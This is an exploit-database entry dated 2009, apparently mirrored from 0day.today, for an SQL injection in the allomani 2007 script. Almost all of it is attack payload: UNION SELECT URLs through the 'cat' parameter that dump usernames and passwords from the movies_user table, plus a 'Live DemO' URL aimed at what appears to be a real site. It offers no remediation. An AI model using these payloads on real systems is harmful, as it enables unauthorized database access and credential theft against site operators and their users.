id: 5703
date: 08/25/2009
title: allomani 2007 (cat) Remote SQL Injection Vulnerability
author: NeX HaCkeR
cves: 

======================================================
allomani 2007 (cat) Remote SQL Injection Vulnerability
======================================================


==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user




#  0day.today [2023-03-22]  #